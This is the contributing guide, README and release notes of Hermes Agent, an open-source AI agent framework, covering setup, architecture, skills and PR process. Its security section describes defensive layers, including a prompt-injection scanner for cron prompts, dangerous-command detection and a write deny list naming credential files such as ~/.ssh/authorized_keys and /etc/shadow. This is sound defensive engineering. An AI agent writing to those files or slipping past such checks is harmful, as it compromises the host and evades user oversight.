- Examples: arXiv search, git workflows, Docker management, PDF processing, email via CLI tools
### Make it a Tool when:
- It requires end-to-end integration with API keys, auth flows, or multi-component configuration managed by the agent harness
- It needs custom processing logic that must execute precisely every time (not "best effort" from LLM interpretation)
- It handles binary data, streaming, or real-time events that can't go through the terminal
- Examples: browser automation (Browserbase session management), TTS (audio encoding + platform delivery), vision analysis (base64 image handling)
### Should the Skill be bundled?
Bundled skills (in `skills/`) ship with every Hermes install. They should be **broadly useful to most users**:
- Document handling, web research, common dev workflows, system administration
- Used regularly by a wide range of people
If your skill is official and useful but not universally needed (e.g., a paid service integration, a heavyweight dependency), put it in **`optional-skills/`** — it ships with the repo but isn't activated by default. Users can discover it via `hermes skills browse` (labeled "official") and install it with `hermes skills install` (no third-party warning, builtin trust).
If your skill is specialized, community-contributed, or niche, it's better suited for a **Skills Hub** — upload it to a skills registry and share it in the [Nous Research Discord](https://discord.gg/NousResearch). Users can install it with `hermes skills install`.
---
## Development Setup
### Prerequisites
| Requirement | Notes |
|-------------|-------|
| **Git** | With `--recurse-submodules` support |
| **Python 3.11+** | uv will install it if missing |
| **uv** | Fast Python package manager ([install](https://docs.astral.sh/uv/)) |
| **Node.js 18+** | Optional — needed for browser tools and WhatsApp bridge |
### Clone and install
```bash
git clone --recurse-submodules https://github.com/NousResearch/hermes-agent.git
cd hermes-agent
# Create venv with Python 3.11
uv venv venv --python 3.11
export VIRTUAL_ENV="$(pwd)/venv"
# Install with all extras (messaging, cron, CLI menus, dev tools)
uv pip install -e ".[all,dev]"
uv pip install -e "./mini-swe-agent"
uv pip install -e "./tinker-atropos"
# Optional: browser tools
npm install
```
### Configure for development
```bash
mkdir -p ~/.hermes/{cron,sessions,logs,memories,skills}
cp cli-config.yaml.example ~/.hermes/config.yaml
touch ~/.hermes/.env
# Add at minimum an LLM provider key:
echo 'OPENROUTER_API_KEY=sk-or-v1-your-key' >> ~/.hermes/.env
```
### Run
```bash
# Symlink for global access
mkdir -p ~/.local/bin
ln -sf "$(pwd)/venv/bin/hermes" ~/.local/bin/hermes
# Verify
hermes doctor
hermes chat -q "Hello"
```
### Run tests
```bash
pytest tests/ -v
```
---
## Project Structure
```
hermes-agent/
├── run_agent.py # AIAgent class — core conversation loop, tool dispatch, session persistence
├── cli.py # HermesCLI class — interactive TUI, prompt_toolkit integration
├── model_tools.py # Tool orchestration (thin layer over tools/registry.py)
├── toolsets.py # Tool groupings and presets (hermes-cli, hermes-telegram, etc.)
├── hermes_state.py # SQLite session database with FTS5 full-text search, session titles
├── batch_runner.py # Parallel batch processing for trajectory generation
├── agent/ # Agent internals (extracted modules)
│ ├── prompt_builder.py # System prompt assembly (identity, skills, context files, memory)
│ ├── context_compressor.py # Auto-summarization when approaching context limits
│ ├── auxiliary_client.py # Resolves auxiliary OpenAI clients (summarization, vision)
│ ├── display.py # KawaiiSpinner, tool progress formatting
│ ├── model_metadata.py # Model context lengths, token estimation
│ └── trajectory.py # Trajectory saving helpers
├── hermes_cli/ # CLI command implementations
│ ├── main.py # Entry point, argument parsing, command dispatch
│ ├── config.py # Config management, migration, env var definitions
│ ├── setup.py # Interactive setup wizard
│ ├── auth.py # Provider resolution, OAuth, Nous Portal
│ ├── models.py # OpenRouter model selection lists
│ ├── banner.py # Welcome banner, ASCII art
│ ├── commands.py # Slash command definitions + autocomplete
│ ├── callbacks.py # Interactive callbacks (clarify, sudo, approval)
│ ├── doctor.py # Diagnostics
│ ├── skills_hub.py # Skills Hub CLI + /skills slash command
│ └── skin_engine.py # Skin/theme engine — data-driven CLI visual customization
├── tools/ # Tool implementations (self-registering)
│ ├── registry.py # Central tool registry (schemas, handlers, dispatch)
│ ├── approval.py # Dangerous command detection + per-session approval
│ ├── terminal_tool.py # Terminal orchestration (sudo, env lifecycle, backends)
│ ├── file_operations.py # read_file, write_file, search, patch, etc.
│ ├── web_tools.py # web_search, web_extract (Firecrawl + Gemini summarization)
│ ├── vision_tools.py # Image analysis via multimodal models
│ ├── delegate_tool.py # Subagent spawning and parallel task execution
│ ├── code_execution_tool.py # Sandboxed Python with RPC tool access
│ ├── session_search_tool.py # Search past conversations with FTS5 + summarization
│ ├── cronjob_tools.py # Scheduled task management
│ ├── skill_tools.py # Skill search, load, manage
│ └── environments/ # Terminal execution backends
│ ├── base.py # BaseEnvironment ABC
│ ├── local.py, docker.py, ssh.py, singularity.py, modal.py, daytona.py
├── gateway/ # Messaging gateway
│ ├── run.py # GatewayRunner — platform lifecycle, message routing, cron
│ ├── config.py # Platform configuration resolution
│ ├── session.py # Session store, context prompts, reset policies
│ └── platforms/ # Platform adapters
│ ├── telegram.py, discord_adapter.py, slack.py, whatsapp.py
├── scripts/ # Installer and bridge scripts
│ ├── install.sh # Linux/macOS installer
│ ├── install.ps1 # Windows PowerShell installer
│ └── whatsapp-bridge/ # Node.js WhatsApp bridge (Baileys)
├── skills/ # Bundled skills (copied to ~/.hermes/skills/ on install)
├── optional-skills/ # Official optional skills (discoverable via hub, not activated by default)
├── environments/ # RL training environments (Atropos integration)
├── tests/ # Test suite
├── website/ # Documentation site (hermes-agent.nousresearch.com)
├── cli-config.yaml.example # Example configuration (copied to ~/.hermes/config.yaml)
└── AGENTS.md # Development guide for AI coding assistants
```
### User configuration (stored in `~/.hermes/`)
| Path | Purpose |
|------|---------|
| `~/.hermes/config.yaml` | Settings (model, terminal, toolsets, compression, etc.) |
| `~/.hermes/.env` | API keys and secrets |
| `~/.hermes/auth.json` | OAuth credentials (Nous Portal) |
| `~/.hermes/skills/` | All active skills (bundled + hub-installed + agent-created) |
| `~/.hermes/memories/` | Persistent memory (MEMORY.md, USER.md) |
| `~/.hermes/state.db` | SQLite session database |
| `~/.hermes/sessions/` | JSON session logs |
| `~/.hermes/cron/` | Scheduled job data |
| `~/.hermes/whatsapp/session/` | WhatsApp bridge credentials |
---
## Architecture Overview
### Core Loop
```
User message → AIAgent._run_agent_loop()
  ├── Build system prompt (prompt_builder.py)
  ├── Build API kwargs (model, messages, tools, reasoning config)
  ├── Call LLM (OpenAI-compatible API)
  ├── If tool_calls in response:
  │     ├── Execute each tool via registry dispatch
  │     ├── Add tool results to conversation
  │     └── Loop back to LLM call
  ├── If text response:
  │     ├── Persist session to DB
  │     └── Return final_response
  └── Context compression if approaching token limit
```
### Key Design Patterns
- **Self-registering tools**: Each tool file calls `registry.register()` at import time. `model_tools.py` triggers discovery by importing all tool modules.
- **Toolset grouping**: Tools are grouped into toolsets (`web`, `terminal`, `file`, `browser`, etc.) that can be enabled/disabled per platform.
- **Session persistence**: All conversations are stored in SQLite (`hermes_state.py`) with full-text search and unique session titles. JSON logs go to `~/.hermes/sessions/`.
- **Ephemeral injection**: System prompts and prefill messages are injected at API call time, never persisted to the database or logs.
- **Provider abstraction**: The agent works with any OpenAI-compatible API. Provider resolution happens at init time (Nous Portal OAuth, OpenRouter API key, or custom endpoint).
- **Provider routing**: When using OpenRouter, `provider_routing` in config.yaml controls provider selection (sort by throughput/latency/price, allow/ignore specific providers, data retention policies). These are injected as `extra_body.provider` in API requests.
---
## Code Style
- **PEP 8** with practical exceptions (we don't enforce strict line length)
- **Comments**: Only when explaining non-obvious intent, trade-offs, or API quirks. Don't narrate what the code does — `# increment counter` adds nothing
- **Error handling**: Catch specific exceptions. Log with `logger.warning()`/`logger.error()` — use `exc_info=True` for unexpected errors so stack traces appear in logs
- **Cross-platform**: Never assume Unix. See [Cross-Platform Compatibility](#cross-platform-compatibility)
---
## Adding a New Tool
Before writing a tool, ask: [should this be a skill instead?](#should-it-be-a-skill-or-a-tool)
Tools self-register with the central registry. Each tool file co-locates its schema, handler, and registration:
```python
"""my_tool — Brief description of what this tool does."""
import json
from tools.registry import registry
def my_tool(param1: str, param2: int = 10, **kwargs) -> str:
"""Handler. Returns a string result (often JSON)."""
result = do_work(param1, param2)
return json.dumps(result)
MY_TOOL_SCHEMA = {
"type": "function",
"function": {
"name": "my_tool",
"description": "What this tool does and when the agent should use it.",
"parameters": {
"type": "object",
"properties": {
"param1": {"type": "string", "description": "What param1 is"},
"param2": {"type": "integer", "description": "What param2 is", "default": 10},
},
"required": ["param1"],
},
},
}
def _check_requirements() -> bool:
"""Return True if this tool's dependencies are available."""
return True
registry.register(
name="my_tool",
toolset="my_toolset",
schema=MY_TOOL_SCHEMA,
handler=lambda args, **kw: my_tool(**args, **kw),
check_fn=_check_requirements,
)
```
Then add the import to `model_tools.py` in the `_modules` list:
```python
_modules = [
    # ... existing modules ...
    "tools.my_tool",
]
```
If it's a new toolset, add it to `toolsets.py` and to the relevant platform presets.
---
## Adding a Skill
Bundled skills live in `skills/` organized by category. Official optional skills use the same structure in `optional-skills/`:
```
skills/
├── research/
│   └── arxiv/
│       ├── SKILL.md           # Required: main instructions
│       └── scripts/           # Optional: helper scripts
│           └── search_arxiv.py
├── productivity/
│   └── ocr-and-documents/
│       ├── SKILL.md
│       ├── scripts/
│       └── references/
└── ...
```
### SKILL.md format
```markdown
---
name: my-skill
description: Brief description (shown in skill search results)
version: 1.0.0
author: Your Name
license: MIT
platforms: [macos, linux]          # Optional — restrict to specific OS platforms
                                   #   Valid: macos, linux, windows
                                   #   Omit to load on all platforms (default)
required_environment_variables:    # Optional — secure setup-on-load metadata
  - name: MY_API_KEY
    prompt: API key
    help: Where to get it
    required_for: full functionality
prerequisites:                     # Optional legacy runtime requirements
  env_vars: [MY_API_KEY]           # Backward-compatible alias for required env vars
  commands: [curl, jq]             # Advisory only; does not hide the skill
metadata:
  hermes:
    tags: [Category, Subcategory, Keywords]
    related_skills: [other-skill-name]
    fallback_for_toolsets: [web]   # Optional — show only when toolset is unavailable
    requires_toolsets: [terminal]  # Optional — show only when toolset is available
---

# Skill Title

Brief intro.

## When to Use
Trigger conditions — when should the agent load this skill?

## Quick Reference
Table of common commands or API calls.

## Procedure
Step-by-step instructions the agent follows.

## Pitfalls
Known failure modes and how to handle them.

## Verification
How the agent confirms it worked.
```
### Platform-specific skills
Skills can declare which OS platforms they support via the `platforms` frontmatter field. Skills with this field are automatically hidden from the system prompt, `skills_list()`, and slash commands on incompatible platforms.
```yaml
platforms: [macos] # macOS only (e.g., iMessage, Apple Reminders)
platforms: [macos, linux] # macOS and Linux
platforms: [windows] # Windows only
```
If the field is omitted or empty, the skill loads on all platforms (backward compatible). See `skills/apple/` for examples of macOS-only skills.
### Conditional skill activation
Skills can declare conditions that control when they appear in the system prompt, based on which tools and toolsets are available in the current session. This is primarily used for **fallback skills** — alternatives that should only be shown when a primary tool is unavailable.
Four fields are supported under `metadata.hermes`:
```yaml
metadata:
  hermes:
    fallback_for_toolsets: [web]       # Show ONLY when these toolsets are unavailable
    requires_toolsets: [terminal]      # Show ONLY when these toolsets are available
    fallback_for_tools: [web_search]   # Show ONLY when these specific tools are unavailable
    requires_tools: [terminal]         # Show ONLY when these specific tools are available
```
**Semantics:**
- `fallback_for_*`: The skill is a backup. It is **hidden** when the listed tools/toolsets are available, and **shown** when they are unavailable. Use this for free alternatives to premium tools.
- `requires_*`: The skill needs certain tools to function. It is **hidden** when the listed tools/toolsets are unavailable. Use this for skills that depend on specific capabilities (e.g., a skill that only makes sense with terminal access).
- If both are specified, both conditions must be satisfied for the skill to appear.
- If neither is specified, the skill is always shown (backward compatible).
**Examples:**
```yaml
# DuckDuckGo search — shown when Firecrawl (web toolset) is unavailable
metadata:
  hermes:
    fallback_for_toolsets: [web]

# Smart home skill — only useful when terminal is available
metadata:
  hermes:
    requires_toolsets: [terminal]

# Local browser fallback — shown when Browserbase is unavailable
metadata:
  hermes:
    fallback_for_toolsets: [browser]
```
The filtering happens at prompt build time in `agent/prompt_builder.py`. The `build_skills_system_prompt()` function receives the set of available tools and toolsets from the agent and uses `_skill_should_show()` to evaluate each skill's conditions.
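A condensed sketch of those rules (the real `_skill_should_show()` signature and field plumbing in `prompt_builder.py` may differ):
```python
def _skill_should_show(meta: dict, toolsets: set, tools: set) -> bool:
    """Sketch of the conditional-activation semantics described above."""
    # fallback_for_*: hide while any listed toolset/tool is still available
    if set(meta.get("fallback_for_toolsets", [])) & toolsets:
        return False
    if set(meta.get("fallback_for_tools", [])) & tools:
        return False
    # requires_*: hide unless every listed toolset/tool is available
    if not set(meta.get("requires_toolsets", [])) <= toolsets:
        return False
    if not set(meta.get("requires_tools", [])) <= tools:
        return False
    return True
```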
### Skill setup metadata
Skills can declare secure setup-on-load metadata via the `required_environment_variables` frontmatter field. Missing values do not hide the skill from discovery; they trigger a CLI-only secure prompt when the skill is actually loaded.
```yaml
required_environment_variables:
  - name: TENOR_API_KEY
    prompt: Tenor API key
    help: Get a key from https://developers.google.com/tenor
    required_for: full functionality
```
The user may skip setup and still load the skill. Hermes only exposes metadata (`stored_as`, `skipped`, `validated`) to the model — never the secret value.
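For instance, the model-visible record for a completed setup might look like this. A hypothetical illustration: only the field names come from the behavior described above, not the exact shape or values.
```json
{"name": "TENOR_API_KEY", "stored_as": "~/.hermes/.env", "skipped": false, "validated": true}
```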
Legacy `prerequisites.env_vars` remains supported and is normalized into the new representation.
```yaml
prerequisites:
  env_vars: [TENOR_API_KEY]   # Legacy alias for required_environment_variables
  commands: [curl, jq]        # Advisory CLI checks
```
Gateway and messaging sessions never collect secrets in-band; they instruct the user to run `hermes setup` or update `~/.hermes/.env` locally.
**When to declare required environment variables:**
- The skill uses an API key or token that should be collected securely at load time
- The skill can still be useful if the user skips setup, but may degrade gracefully
**When to declare command prerequisites:**
- The skill relies on a CLI tool that may not be installed (e.g., `himalaya`, `openhue`, `ddgs`)
- Treat command checks as guidance, not discovery-time hiding
See `skills/gifs/gif-search/` and `skills/email/himalaya/` for examples.
### Skill guidelines
- **No external dependencies unless absolutely necessary.** Prefer stdlib Python, curl, and existing Hermes tools (`web_extract`, `terminal`, `read_file`).
- **Progressive disclosure.** Put the most common workflow first. Edge cases and advanced usage go at the bottom.
- **Include helper scripts** for XML/JSON parsing or complex logic — don't expect the LLM to write parsers inline every time.
- **Test it.** Run `hermes --toolsets skills -q "Use the X skill to do Y"` and verify the agent follows the instructions correctly.
---
## Adding a Skin / Theme
Hermes uses a data-driven skin system — no code changes needed to add a new skin.
**Option A: User skin (YAML file)**
Create `~/.hermes/skins/<name>.yaml`:
```yaml
name: mytheme
description: Short description of the theme
colors:
  banner_border: "#HEX"     # Panel border color
  banner_title: "#HEX"      # Panel title color
  banner_accent: "#HEX"     # Section header color
  banner_dim: "#HEX"        # Muted/dim text color
  banner_text: "#HEX"       # Body text color
  response_border: "#HEX"   # Response box border
spinner:
  waiting_faces: ["(⚔)", "(⛨)"]
  thinking_faces: ["(⚔)", "(⌁)"]
  thinking_verbs: ["forging", "plotting"]
  wings:                    # Optional left/right decorations
    - ["⟪⚔", "⚔⟫"]
branding:
  agent_name: "My Agent"
  welcome: "Welcome message"
  response_label: " ⚔ Agent "
  prompt_symbol: "⚔ "
  tool_prefix: "╎"          # Tool output line prefix
```
All fields are optional — missing values inherit from the default skin.
**Option B: Built-in skin**
Add to `_BUILTIN_SKINS` dict in `hermes_cli/skin_engine.py`. Use the same schema as above but as a Python dict. Built-in skins ship with the package and are always available.
**Activating:**
- CLI: `/skin mytheme` or set `display.skin: mytheme` in config.yaml
- Config: `display: { skin: mytheme }`
See `hermes_cli/skin_engine.py` for the full schema and existing skins as examples.
---
## Cross-Platform Compatibility
Hermes runs on Linux, macOS, and Windows. When writing code that touches the OS:
### Critical rules
1. **`termios` and `fcntl` are Unix-only.** Always catch both `ImportError` and `NotImplementedError`:
```python
try:
    from simple_term_menu import TerminalMenu
    menu = TerminalMenu(options)
    idx = menu.show()
except (ImportError, NotImplementedError):
    # Fallback: numbered menu for Windows
    for i, opt in enumerate(options):
        print(f" {i+1}. {opt}")
    idx = int(input("Choice: ")) - 1
```
2. **File encoding.** Windows may save `.env` files in `cp1252`. Always handle encoding errors:
```python
from dotenv import load_dotenv

try:
    load_dotenv(env_path)
except UnicodeDecodeError:
    load_dotenv(env_path, encoding="latin-1")
```
3. **Process management.** `os.setsid()`, `os.killpg()`, and signal handling differ on Windows. Use platform checks:
```python
import os
import platform

if platform.system() != "Windows":
    kwargs["preexec_fn"] = os.setsid
```
4. **Path separators.** Use `pathlib.Path` instead of string concatenation with `/` (see the one-liner after this list).
5. **Shell commands in installers.** If you change `scripts/install.sh`, check if the equivalent change is needed in `scripts/install.ps1`.
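For rule 4, the pattern is a one-liner:
```python
from pathlib import Path

config_path = Path.home() / ".hermes" / "config.yaml"  # correct separators on every OS
```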
---
## Security Considerations
Hermes has terminal access. Security matters.
### Existing protections
| Layer | Implementation |
|-------|---------------|
| **Sudo password piping** | Uses `shlex.quote()` to prevent shell injection |
| **Dangerous command detection** | Regex patterns in `tools/approval.py` with user approval flow |
| **Cron prompt injection** | Scanner in `tools/cronjob_tools.py` blocks instruction-override patterns |
| **Write deny list** | Protected paths (`~/.ssh/authorized_keys`, `/etc/shadow`) resolved via `os.path.realpath()` to prevent symlink bypass |
| **Skills guard** | Security scanner for hub-installed skills (`tools/skills_guard.py`) |
| **Code execution sandbox** | `execute_code` child process runs with API keys stripped from environment |
| **Container hardening** | Docker: all capabilities dropped, no privilege escalation, PID limits, size-limited tmpfs |
### When contributing security-sensitive code
- **Always use `shlex.quote()`** when interpolating user input into shell commands (see the sketch after this list)
- **Resolve symlinks** with `os.path.realpath()` before path-based access control checks
- **Don't log secrets.** API keys, tokens, and passwords should never appear in log output
- **Catch broad exceptions** around tool execution so a single failure doesn't crash the agent loop
- **Test on all platforms** if your change touches file paths, process management, or shell commands
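A sketch combining the first two rules (all variable names are illustrative):
```python
import os
import shlex

user_pattern = input("pattern: ")                     # untrusted user input
cmd = f"grep -r {shlex.quote(user_pattern)} ."        # now safe to hand to a shell

allowed_root = os.path.realpath(os.path.expanduser("~/workspace"))
requested = os.path.realpath("/some/requested/path")  # resolve symlinks first
if not requested.startswith(allowed_root + os.sep):   # then apply the access check
    raise PermissionError("path outside allowed root")
```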
If your PR affects security, note it explicitly in the description.
---
## Pull Request Process
### Branch naming
```
fix/description # Bug fixes
feat/description # New features
docs/description # Documentation
test/description # Tests
refactor/description # Code restructuring
```
### Before submitting
1. **Run tests**: `pytest tests/ -v`
2. **Test manually**: Run `hermes` and exercise the code path you changed
3. **Check cross-platform impact**: If you touch file I/O, process management, or terminal handling, consider Windows and macOS
4. **Keep PRs focused**: One logical change per PR. Don't mix a bug fix with a refactor with a new feature.
### PR description
Include:
- **What** changed and **why**
- **How to test** it (reproduction steps for bugs, usage examples for features)
- **What platforms** you tested on
- Reference any related issues
### Commit messages
We use [Conventional Commits](https://www.conventionalcommits.org/):
```
<type>(<scope>): <description>
```
| Type | Use for |
|------|---------|
| `fix` | Bug fixes |
| `feat` | New features |
| `docs` | Documentation |
| `test` | Tests |
| `refactor` | Code restructuring (no behavior change) |
| `chore` | Build, CI, dependency updates |
Scopes: `cli`, `gateway`, `tools`, `skills`, `agent`, `install`, `whatsapp`, `security`, etc.
Examples:
```
fix(cli): prevent crash in save_config_value when model is a string
feat(gateway): add WhatsApp multi-user session isolation
fix(security): prevent shell injection in sudo password piping
test(tools): add unit tests for file_operations
```
---
## Reporting Issues
- Use [GitHub Issues](https://github.com/NousResearch/hermes-agent/issues)
- Include: OS, Python version, Hermes version (`hermes version`), full error traceback
- Include steps to reproduce
- Check existing issues before creating duplicates
- For security vulnerabilities, please report privately
---
## Community
- **Discord**: [discord.gg/NousResearch](https://discord.gg/NousResearch) — for questions, showcasing projects, and sharing skills
- **GitHub Discussions**: For design proposals and architecture discussions
- **Skills Hub**: Upload specialized skills to a registry and share them with the community
---
## License
By contributing, you agree that your contributions will be licensed under the [MIT License](LICENSE).

---
MIT License
Copyright (c) 2025 Nous Research
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

---
<p align="center">
<img src="assets/banner.png" alt="Hermes Agent" width="100%">
</p>
# Hermes Agent ⚕
<p align="center">
<a href="https://hermes-agent.nousresearch.com/docs/"><img src="https://img.shields.io/badge/Docs-hermes--agent.nousresearch.com-FFD700?style=for-the-badge" alt="Documentation"></a>
<a href="https://discord.gg/NousResearch"><img src="https://img.shields.io/badge/Discord-5865F2?style=for-the-badge&logo=discord&logoColor=white" alt="Discord"></a>
<a href="https://github.com/NousResearch/hermes-agent/blob/main/LICENSE"><img src="https://img.shields.io/badge/License-MIT-green?style=for-the-badge" alt="License: MIT"></a>
<a href="https://nousresearch.com"><img src="https://img.shields.io/badge/Built%20by-Nous%20Research-blueviolet?style=for-the-badge" alt="Built by Nous Research"></a>
</p>
**The self-improving AI agent built by [Nous Research](https://nousresearch.com).** It's the only agent with a built-in learning loop — it creates skills from experience, improves them during use, nudges itself to persist knowledge, searches its own past conversations, and builds a deepening model of who you are across sessions. Run it on a $5 VPS, a GPU cluster, or serverless infrastructure that costs nearly nothing when idle. It's not tied to your laptop — talk to it from Telegram while it works on a cloud VM.
Use any model you want — [Nous Portal](https://portal.nousresearch.com), [OpenRouter](https://openrouter.ai) (200+ models), [z.ai/GLM](https://z.ai), [Kimi/Moonshot](https://platform.moonshot.ai), [MiniMax](https://www.minimax.io), OpenAI, or your own endpoint. Switch with `hermes model` — no code changes, no lock-in.
<table>
<tr><td><b>A real terminal interface</b></td><td>Full TUI with multiline editing, slash-command autocomplete, conversation history, interrupt-and-redirect, and streaming tool output.</td></tr>
<tr><td><b>Lives where you do</b></td><td>Telegram, Discord, Slack, WhatsApp, Signal, and CLI — all from a single gateway process. Voice memo transcription, cross-platform conversation continuity.</td></tr>
<tr><td><b>A closed learning loop</b></td><td>Agent-curated memory with periodic nudges. Autonomous skill creation after complex tasks. Skills self-improve during use. FTS5 session search with LLM summarization for cross-session recall. <a href="https://github.com/plastic-labs/honcho">Honcho</a> dialectic user modeling. Compatible with the <a href="https://agentskills.io">agentskills.io</a> open standard.</td></tr>
<tr><td><b>Scheduled automations</b></td><td>Built-in cron scheduler with delivery to any platform. Daily reports, nightly backups, weekly audits — all in natural language, running unattended.</td></tr>
<tr><td><b>Delegates and parallelizes</b></td><td>Spawn isolated subagents for parallel workstreams. Write Python scripts that call tools via RPC, collapsing multi-step pipelines into zero-context-cost turns.</td></tr>
<tr><td><b>Runs anywhere, not just your laptop</b></td><td>Six terminal backends — local, Docker, SSH, Daytona, Singularity, and Modal. Daytona and Modal offer serverless persistence — your agent's environment hibernates when idle and wakes on demand, costing nearly nothing between sessions. Run it on a $5 VPS or a GPU cluster.</td></tr>
<tr><td><b>Research-ready</b></td><td>Batch trajectory generation, Atropos RL environments, trajectory compression for training the next generation of tool-calling models.</td></tr>
</table>
---
## Quick Install
```bash
curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash
```
Works on Linux, macOS, and WSL2. The installer handles everything — Python, Node.js, dependencies, and the `hermes` command. No prerequisites except git.
> **Windows:** Native Windows is not supported. Please install [WSL2](https://learn.microsoft.com/en-us/windows/wsl/install) and run the command above.
After installation:
```bash
source ~/.bashrc # reload shell (or: source ~/.zshrc)
hermes # start chatting!
```
---
## Getting Started
```bash
hermes # Interactive CLI — start a conversation
hermes model # Choose your LLM provider and model
hermes tools # Configure which tools are enabled
hermes config set # Set individual config values
hermes gateway # Start the messaging gateway (Telegram, Discord, etc.)
hermes setup # Run the full setup wizard (configures everything at once)
hermes claw migrate # Migrate settings and data from OpenClaw
hermes update # Update to the latest version
hermes doctor # Diagnose any issues
```
📖 **[Full documentation →](https://hermes-agent.nousresearch.com/docs/)**
---
## Documentation
All documentation lives at **[hermes-agent.nousresearch.com/docs](https://hermes-agent.nousresearch.com/docs/)**:
| Section | What's Covered |
|---------|---------------|
| [Quickstart](https://hermes-agent.nousresearch.com/docs/getting-started/quickstart) | Install → setup → first conversation in 2 minutes |
| [CLI Usage](https://hermes-agent.nousresearch.com/docs/user-guide/cli) | Commands, keybindings, personalities, sessions |
| [Configuration](https://hermes-agent.nousresearch.com/docs/user-guide/configuration) | Config file, providers, models, all options |
| [Messaging Gateway](https://hermes-agent.nousresearch.com/docs/user-guide/messaging) | Telegram, Discord, Slack, WhatsApp, Signal, Home Assistant |
| [Security](https://hermes-agent.nousresearch.com/docs/user-guide/security) | Command approval, DM pairing, container isolation |
| [Tools & Toolsets](https://hermes-agent.nousresearch.com/docs/user-guide/features/tools) | 40+ tools, toolset system, terminal backends |
| [Skills System](https://hermes-agent.nousresearch.com/docs/user-guide/features/skills) | Procedural memory, Skills Hub, creating skills |
| [Memory](https://hermes-agent.nousresearch.com/docs/user-guide/features/memory) | Persistent memory, user profiles, best practices |
| [MCP Integration](https://hermes-agent.nousresearch.com/docs/user-guide/features/mcp) | Connect any MCP server for extended capabilities |
| [Cron Scheduling](https://hermes-agent.nousresearch.com/docs/user-guide/features/cron) | Scheduled tasks with platform delivery |
| [Context Files](https://hermes-agent.nousresearch.com/docs/user-guide/features/context-files) | Project context that shapes every conversation |
| [Architecture](https://hermes-agent.nousresearch.com/docs/developer-guide/architecture) | Project structure, agent loop, key classes |
| [Contributing](https://hermes-agent.nousresearch.com/docs/developer-guide/contributing) | Development setup, PR process, code style |
| [CLI Reference](https://hermes-agent.nousresearch.com/docs/reference/cli-commands) | All commands and flags |
| [Environment Variables](https://hermes-agent.nousresearch.com/docs/reference/environment-variables) | Complete env var reference |
---
## Migrating from OpenClaw
If you're coming from OpenClaw, Hermes can automatically import your settings, memories, skills, and API keys.
**During first-time setup:** The setup wizard (`hermes setup`) automatically detects `~/.openclaw` and offers to migrate before configuration begins.
**Anytime after install:**
```bash
hermes claw migrate # Interactive migration (full preset)
hermes claw migrate --dry-run # Preview what would be migrated
hermes claw migrate --preset user-data # Migrate without secrets
hermes claw migrate --overwrite # Overwrite existing conflicts
```
What gets imported:
- **SOUL.md** — persona file
- **Memories** — MEMORY.md and USER.md entries
- **Skills** — user-created skills → `~/.hermes/skills/openclaw-imports/`
- **Command allowlist** — approval patterns
- **Messaging settings** — platform configs, allowed users, working directory
- **API keys** — allowlisted secrets (Telegram, OpenRouter, OpenAI, Anthropic, ElevenLabs)
- **TTS assets** — workspace audio files
- **Workspace instructions** — AGENTS.md (with `--workspace-target`)
See `hermes claw migrate --help` for all options, or use the `openclaw-migration` skill for an interactive agent-guided migration with dry-run previews.
---
## Contributing
We welcome contributions! See the [Contributing Guide](https://hermes-agent.nousresearch.com/docs/developer-guide/contributing) for development setup, code style, and PR process.
Quick start for contributors:
```bash
git clone https://github.com/NousResearch/hermes-agent.git
cd hermes-agent
git submodule update --init mini-swe-agent # required terminal backend
curl -LsSf https://astral.sh/uv/install.sh | sh
uv venv .venv --python 3.11
source .venv/bin/activate
uv pip install -e ".[all,dev]"
uv pip install -e "./mini-swe-agent"
python -m pytest tests/ -q
```
> **RL Training (optional):** To work on the RL/Tinker-Atropos integration, also run:
> ```bash
> git submodule update --init tinker-atropos
> uv pip install -e "./tinker-atropos"
> ```
---
## Community
- 💬 [Discord](https://discord.gg/NousResearch)
- 📚 [Skills Hub](https://agentskills.io)
- 🐛 [Issues](https://github.com/NousResearch/hermes-agent/issues)
- 💡 [Discussions](https://github.com/NousResearch/hermes-agent/discussions)
---
## License
MIT — see [LICENSE](LICENSE).
Built by [Nous Research](https://nousresearch.com).

---
# Hermes Agent v0.2.0 (v2026.3.12)
**Release Date:** March 12, 2026
> First tagged release since v0.1.0 (the initial pre-public foundation). In just over two weeks, Hermes Agent went from a small internal project to a full-featured AI agent platform — thanks to an explosion of community contributions. This release covers **216 merged pull requests** from **63 contributors**, resolving **119 issues**.
---
## ✨ Highlights
- **Multi-Platform Messaging Gateway** — Telegram, Discord, Slack, WhatsApp, Signal, Email (IMAP/SMTP), and Home Assistant platforms with unified session management, media attachments, and per-platform tool configuration.
- **MCP (Model Context Protocol) Client** — Native MCP support with stdio and HTTP transports, reconnection, resource/prompt discovery, and sampling (server-initiated LLM requests). ([#291](https://github.com/NousResearch/hermes-agent/pull/291) — @0xbyt4, [#301](https://github.com/NousResearch/hermes-agent/pull/301), [#753](https://github.com/NousResearch/hermes-agent/pull/753))
- **Skills Ecosystem** — 70+ bundled and optional skills across 15+ categories with a Skills Hub for community discovery, per-platform enable/disable, conditional activation based on tool availability, and prerequisite validation. ([#743](https://github.com/NousResearch/hermes-agent/pull/743) — @teyrebaz33, [#785](https://github.com/NousResearch/hermes-agent/pull/785) — @teyrebaz33)
- **Centralized Provider Router** — Unified `call_llm()`/`async_call_llm()` API replaces scattered provider logic across vision, summarization, compression, and trajectory saving. All auxiliary consumers route through a single code path with automatic credential resolution. ([#1003](https://github.com/NousResearch/hermes-agent/pull/1003))
- **ACP Server** — VS Code, Zed, and JetBrains editor integration via the Agent Communication Protocol standard. ([#949](https://github.com/NousResearch/hermes-agent/pull/949))
- **CLI Skin/Theme Engine** — Data-driven visual customization: banners, spinners, colors, branding. 7 built-in skins + custom YAML skins.
